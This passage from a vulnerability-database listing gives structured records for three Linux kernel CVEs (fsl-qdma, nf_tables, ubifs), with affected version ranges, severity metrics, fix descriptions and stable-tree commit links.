              "lessThan": "a69c8bbb946936ac4eb6a6ae1e849435aa8d947d",
              "status": "affected",
              "version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
              "versionType": "git"
            },
            {
              "lessThan": "677102a930643c31f1b4c512b041407058bdfef8",
              "status": "affected",
              "version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
              "versionType": "git"
            },
            {
              "lessThan": "87a39071e0b639f45e05d296cc0538eef44ec0bd",
              "status": "affected",
              "version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/fsl-qdma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.271",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.212",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.21",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.271",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.212",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.21",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: fsl-qdma: init irq after reg initialization\n\nInitialize the qDMA irqs after the registers are configured so that\ninterrupts that may have been pending from a primary kernel don\u0027t get\nprocessed by the irq handler before it is ready to and cause panic with\nthe following trace:\n\n  Call trace:\n   fsl_qdma_queue_handler+0xf8/0x3e8\n   __handle_irq_event_percpu+0x78/0x2b0\n   handle_irq_event_percpu+0x1c/0x68\n   handle_irq_event+0x44/0x78\n   handle_fasteoi_irq+0xc8/0x178\n   generic_handle_irq+0x24/0x38\n   __handle_domain_irq+0x90/0x100\n   gic_handle_irq+0x5c/0xb8\n   el1_irq+0xb8/0x180\n   _raw_spin_unlock_irqrestore+0x14/0x40\n   __setup_irq+0x4bc/0x798\n   request_threaded_irq+0xd8/0x190\n   devm_request_threaded_irq+0x74/0xe8\n   fsl_qdma_probe+0x4d4/0xca8\n   platform_drv_probe+0x50/0xa0\n   really_probe+0xe0/0x3f8\n   driver_probe_device+0x64/0x130\n   device_driver_attach+0x6c/0x78\n   __driver_attach+0xbc/0x158\n   bus_for_each_dev+0x5c/0x98\n   driver_attach+0x20/0x28\n   bus_add_driver+0x158/0x220\n   driver_register+0x60/0x110\n   __platform_driver_register+0x44/0x50\n   fsl_qdma_driver_init+0x18/0x20\n   do_one_initcall+0x48/0x258\n   kernel_init_freeable+0x1a4/0x23c\n   kernel_init+0x10/0xf8\n   ret_from_fork+0x10/0x18"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:56:32.671Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3cc5fb824c2125aa3740d905b3e5b378c8a09478"
        },
        {
          "url": "https://git.kernel.org/stable/c/9579a21e99fe8dab22a253050ddff28d340d74e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/4529c084a320be78ff2c5e64297ae998c6fdf66b"
        },
        {
          "url": "https://git.kernel.org/stable/c/474d521da890b3e3585335fb80a6044cb2553d99"
        },
        {
          "url": "https://git.kernel.org/stable/c/a69c8bbb946936ac4eb6a6ae1e849435aa8d947d"
        },
        {
          "url": "https://git.kernel.org/stable/c/677102a930643c31f1b4c512b041407058bdfef8"
        },
        {
          "url": "https://git.kernel.org/stable/c/87a39071e0b639f45e05d296cc0538eef44ec0bd"
        }
      ],
      "title": "dmaengine: fsl-qdma: init irq after reg initialization",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26788",
    "datePublished": "2024-04-04T08:20:20.410Z",
    "dateReserved": "2024-02-19T14:20:24.178Z",
    "dateUpdated": "2025-05-04T08:56:32.671Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27065 (GCVE-0-2024-27065)

Vulnerability from cvelistv5 – Published: 2024-05-01 13:04 – Updated: 2025-05-04 09:03

Title

netfilter: nf_tables: do not compare internal table flags on updates

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: do not compare internal table flags on updates Restore skipping transaction if table update does not modify flags.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/845083249d6a392f3…
	https://git.kernel.org/stable/c/2531f907d3e40a617…
	https://git.kernel.org/stable/c/fcf32a5bfcb8a57ac…
	https://git.kernel.org/stable/c/640dbf688ba955e83…
	https://git.kernel.org/stable/c/9683cb6c2c6c0f455…
	https://git.kernel.org/stable/c/4d37f12707ee965d3…
	https://git.kernel.org/stable/c/3443e57654f90c9a8…
	https://git.kernel.org/stable/c/df257c435e51651c4…
	https://git.kernel.org/stable/c/4a0e7f2decbf9bd72…

Impacted products

Vendor

Product

Version

Linux

Affected: bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3 , < 845083249d6a392f3a88804e1669bdb936ee129f (git)
Affected: e10f661adc556c4969c70ddaddf238bffdaf1e87 , < 2531f907d3e40a6173090f10670ae76d117ab27b (git)
Affected: d9c4da8cb74e8ee6e58a064a3573aa37acf6c935 , < fcf32a5bfcb8a57ac0ce717fcfa4d688c91f1005 (git)
Affected: 179d9ba5559a756f4322583388b3213fe4e391b0 , < 640dbf688ba955e83e03de84fbdda8e570b7cce4 (git)
Affected: 179d9ba5559a756f4322583388b3213fe4e391b0 , < 9683cb6c2c6c0f45537bf0b8868b5d38fcb63fc7 (git)
Affected: 179d9ba5559a756f4322583388b3213fe4e391b0 , < 4d37f12707ee965d338028732575f0b85f6d9e4f (git)
Affected: 179d9ba5559a756f4322583388b3213fe4e391b0 , < 3443e57654f90c9a843ab6a6040c10709fd033aa (git)
Affected: 179d9ba5559a756f4322583388b3213fe4e391b0 , < df257c435e51651c43b86326d112ddadda76350e (git)
Affected: 179d9ba5559a756f4322583388b3213fe4e391b0 , < 4a0e7f2decbf9bd72461226f1f5f7dcc4b08f139 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27065",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-13T19:23:19.271055Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-13T19:23:29.610Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:27:58.377Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/845083249d6a392f3a88804e1669bdb936ee129f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2531f907d3e40a6173090f10670ae76d117ab27b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fcf32a5bfcb8a57ac0ce717fcfa4d688c91f1005"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/640dbf688ba955e83e03de84fbdda8e570b7cce4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9683cb6c2c6c0f45537bf0b8868b5d38fcb63fc7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4d37f12707ee965d338028732575f0b85f6d9e4f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3443e57654f90c9a843ab6a6040c10709fd033aa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/df257c435e51651c43b86326d112ddadda76350e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4a0e7f2decbf9bd72461226f1f5f7dcc4b08f139"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "845083249d6a392f3a88804e1669bdb936ee129f",
              "status": "affected",
              "version": "bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3",
              "versionType": "git"
            },
            {
              "lessThan": "2531f907d3e40a6173090f10670ae76d117ab27b",
              "status": "affected",
              "version": "e10f661adc556c4969c70ddaddf238bffdaf1e87",
              "versionType": "git"
            },
            {
              "lessThan": "fcf32a5bfcb8a57ac0ce717fcfa4d688c91f1005",
              "status": "affected",
              "version": "d9c4da8cb74e8ee6e58a064a3573aa37acf6c935",
              "versionType": "git"
            },
            {
              "lessThan": "640dbf688ba955e83e03de84fbdda8e570b7cce4",
              "status": "affected",
              "version": "179d9ba5559a756f4322583388b3213fe4e391b0",
              "versionType": "git"
            },
            {
              "lessThan": "9683cb6c2c6c0f45537bf0b8868b5d38fcb63fc7",
              "status": "affected",
              "version": "179d9ba5559a756f4322583388b3213fe4e391b0",
              "versionType": "git"
            },
            {
              "lessThan": "4d37f12707ee965d338028732575f0b85f6d9e4f",
              "status": "affected",
              "version": "179d9ba5559a756f4322583388b3213fe4e391b0",
              "versionType": "git"
            },
            {
              "lessThan": "3443e57654f90c9a843ab6a6040c10709fd033aa",
              "status": "affected",
              "version": "179d9ba5559a756f4322583388b3213fe4e391b0",
              "versionType": "git"
            },
            {
              "lessThan": "df257c435e51651c43b86326d112ddadda76350e",
              "status": "affected",
              "version": "179d9ba5559a756f4322583388b3213fe4e391b0",
              "versionType": "git"
            },
            {
              "lessThan": "4a0e7f2decbf9bd72461226f1f5f7dcc4b08f139",
              "status": "affected",
              "version": "179d9ba5559a756f4322583388b3213fe4e391b0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "5.4.262",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "5.10.202",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: do not compare internal table flags on updates\n\nRestore skipping transaction if table update does not modify flags."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:03:27.801Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/845083249d6a392f3a88804e1669bdb936ee129f"
        },
        {
          "url": "https://git.kernel.org/stable/c/2531f907d3e40a6173090f10670ae76d117ab27b"
        },
        {
          "url": "https://git.kernel.org/stable/c/fcf32a5bfcb8a57ac0ce717fcfa4d688c91f1005"
        },
        {
          "url": "https://git.kernel.org/stable/c/640dbf688ba955e83e03de84fbdda8e570b7cce4"
        },
        {
          "url": "https://git.kernel.org/stable/c/9683cb6c2c6c0f45537bf0b8868b5d38fcb63fc7"
        },
        {
          "url": "https://git.kernel.org/stable/c/4d37f12707ee965d338028732575f0b85f6d9e4f"
        },
        {
          "url": "https://git.kernel.org/stable/c/3443e57654f90c9a843ab6a6040c10709fd033aa"
        },
        {
          "url": "https://git.kernel.org/stable/c/df257c435e51651c43b86326d112ddadda76350e"
        },
        {
          "url": "https://git.kernel.org/stable/c/4a0e7f2decbf9bd72461226f1f5f7dcc4b08f139"
        }
      ],
      "title": "netfilter: nf_tables: do not compare internal table flags on updates",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27065",
    "datePublished": "2024-05-01T13:04:09.106Z",
    "dateReserved": "2024-02-19T14:20:24.215Z",
    "dateUpdated": "2025-05-04T09:03:27.801Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35821 (GCVE-0-2024-35821)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:23 – Updated: 2025-05-04 09:06

Title

ubifs: Set page uptodate in the correct place

Summary

In the Linux kernel, the following vulnerability has been resolved: ubifs: Set page uptodate in the correct place Page cache reads are lockless, so setting the freshly allocated page uptodate before we've overwritten it with the data it's supposed to have in it will allow a simultaneous reader to see old data. Move the call to SetPageUptodate into ubifs_write_end(), which is after we copied the new data into the page.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-772 - Missing Release of Resource after Effective Lifetime

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4aa554832b9dc9e66…
	https://git.kernel.org/stable/c/778c6ad40256f1c03…
	https://git.kernel.org/stable/c/8f599ab6fabbca4c7…
	https://git.kernel.org/stable/c/f19b1023a3758f407…
	https://git.kernel.org/stable/c/142d87c958d9454c3…
	https://git.kernel.org/stable/c/fc99f4e2d2f1ce766…
	https://git.kernel.org/stable/c/4b7c4fc60d6a46350…
	https://git.kernel.org/stable/c/17772bbe9cfa972ea…
	https://git.kernel.org/stable/c/723012cab779eee82…

Impacted products

Vendor

Product

Version

Linux

Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < 4aa554832b9dc9e66249df75b8f447d87853e12e (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < 778c6ad40256f1c03244fc06d7cdf71f6b5e7310 (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < 8f599ab6fabbca4c741107eade70722a98adfd9f (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < f19b1023a3758f40791ec166038d6411c8894ae3 (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < 142d87c958d9454c3cffa625fab56f3016e8f9f3 (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < fc99f4e2d2f1ce766c14e98463c2839194ae964f (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < 4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < 17772bbe9cfa972ea1ff827319f6e1340de76566 (git)
Affected: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d , < 723012cab779eee8228376754e22c6594229bf8f (git)

Linux

Affected: 2.6.27
Unaffected: 0 , < 2.6.27 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "4aa554832b9d",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "778c6ad40256",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "8f599ab6fabb",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "f19b1023a375",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "142d87c958d9",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "fc99f4e2d2f1",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "4b7c4fc60d6a",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "17772bbe9cfa",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "723012cab779",
                "status": "affected",
                "version": "1e51764a3c2a",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "2.6.27"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "2.6.27",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "4.19.*",
                "status": "unaffected",
                "version": "4.19.312",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.4.*",
                "status": "unaffected",
                "version": "5.4.274",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.10.*",
                "status": "unaffected",
                "version": "5.10.215",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.15.*",
                "status": "unaffected",
                "version": "5.15.154",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.1.*",
                "status": "unaffected",
                "version": "6.1.84",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.6.*",
                "status": "unaffected",
                "version": "6.6.24",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.7.*",
                "status": "unaffected",
                "version": "6.7.12",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.8.*",
                "status": "unaffected",
                "version": "6.8.3",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "NONE",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35821",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-23T21:47:42.750475Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-772",
                "description": "CWE-772 Missing Release of Resource after Effective Lifetime",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-23T21:48:10.927Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.066Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4aa554832b9dc9e66249df75b8f447d87853e12e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/778c6ad40256f1c03244fc06d7cdf71f6b5e7310"
          },
          {
